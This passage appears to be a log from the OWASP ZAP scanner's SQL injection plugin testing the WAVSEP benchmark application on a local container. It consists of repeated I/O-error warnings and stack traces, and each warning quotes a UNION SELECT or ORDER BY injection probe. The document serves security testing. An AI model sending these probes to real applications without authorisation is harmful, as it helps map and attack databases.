org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679388 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679389 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679390 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679388 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679392 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679392 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679394 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679395 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 8020-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 8020-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679396 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679397 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679399 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679403 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679403 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' ORDER BY 2131-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' ORDER BY 2131-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at 